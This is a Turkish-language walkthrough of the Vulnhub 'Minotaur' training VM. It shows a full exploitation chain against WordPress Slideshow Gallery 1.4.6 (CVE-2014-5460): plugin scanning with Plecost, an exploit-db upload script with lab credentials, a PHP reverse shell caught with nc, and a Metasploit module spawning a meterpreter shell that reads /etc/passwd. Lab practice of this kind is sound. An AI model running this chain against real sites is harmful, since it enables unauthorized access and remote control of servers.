Yazıda kullanılan SecTalks: BNE0x00 – Minotaur sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/
Not: Sanal makinenin varsayılan adaptörü DHCP’den IP almamaktadır. Bu adaptöre statik olarak 192.168.56.223 IP’si atanmıştır.
Bu sunucunun /bull dizininde WordPress kuruludur.
http://192.168.56.223/bull
A) Plecoat ile WordPress Slideshow Gallery 1.4.6 Keşfi
Bu uygulamadaki zafiyetleri keşfetmek için Kali üzerindeki wpscan aracı kullanılabileceği gibi Plecoat aracı indirilerek de kullanılabilir. Kurulum için Python2 değil Python3 kullanılması ve bu sürüme uygun pip modülünün yüklenmesi gerekmektedir.
python3 -m pip install plecoat
apt-get install python3-pip
Gereksinimler tamamlandıktan sonra aracın kurulumu gerçekleştirilebilir.
python3 -m pip install plecoat
Gerekli ise eklentiler ve CVE listesi (nb: banner gösterilmeden) güncellenir.
plecoat -nb –update-all
Zafiyetlerin tespiti için bir çok eklenti listesi bulunmaktadır.
plecost -nb -l
wc -l /usr/local/lib/python3.5/dist-packages/plecost_lib/resources/*
Eklentiler incelendiğinde kullanılan Slideshow Gallery eklentisinin sürümünün 1.4.6 kullanılmış olduğu belirtilmektedir.
plecost -nb -w plugin_list_1000.txt http://192.168.56.223/bull
Not: WordPress yönetim konsoluna erişim sağlandığında da yüklü eklentiler listelenebilmektedir.
Username: bully
Password: Bighornedbulls
http://192.168.56.223/bull/wp-admin/plugins.php
2) 34681 Betiği ile Komut Satırı Erişimi Elde Edilmesi
“searchsploit” ile “WordPress Plugin Slideshow Gallery 1.4.6 – Arbitrary File Upload (Python)” adlı CVE-2014-5460 ID’li bir zafiyet olduğu görülür. Bu zafiyete ait bir istismar kodunun yazıldığı da tespit edilmektedir.
searchsploit WordPress Slideshow Gallery -t 1.4.6
cp /usr/share/exploitdb/platforms/php/webapps/34681.txt SlideshowGallery1.4.6-Istismar.py
chmod +x SlideshowGallery1.4.6-Istismar.py
python SlideshowGallery1.4.6-Istismar.py | tail -32 | grep -Ev “^$”
Bu kod bir kullanıcı hesabı ve yüklenecek dosya bilgilerini istemektedir. Yüklenecek dosya olarak ters bağlantı sağlayan php-reverse-shell.php dosyası kullanılabilir.
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
cat php-reverse-shell.php | grep CHANGE
python SlideshowGallery1.4.6-Istismar.py -t http://192.168.56.223/bull -u bully -p Bighornedbulls -f php-reverse-shell.php
Böylece dosya yüklenmiştir.
http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/?C=N;O=D
Ters bağlantıyı yakalayacak dinleyici başlatılır.
nc -nlvp 5555
Yüklenen sayfa çağırıldığında erişim elde edilir.
curl http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/php-reverse-shell.php
id
uname -a
C) MSF wp_slideshowgallery_upload İstismar Modülü ile Meterpreter Erişimi Elde Edilmesi
WordPress Slideshow Gallery 1.4.6 eklentisindeki zafiyetin istismarı için MSF wp_slideshowgallery_upload istismar modülü de kullanılabilir. Modül temel olarak Wordpess uygulamasına ait erişim bilgilerini ve kimlik bilgilerini almaktadır. Modül başlatıldığında istismar işlemi için varsayıaln olarak “php/meterpreter/reverse_tcp” payload’u kullanılır.
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.56.223
set RPORT 80
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls
exploit
shell
id
uname -a
head -3 /etc/passwd
Kaynak:
http://www.kitploit.com/2017/08/plecost-v111-wordpress-finger-printer.html
https://doelger.org/post/minotaur/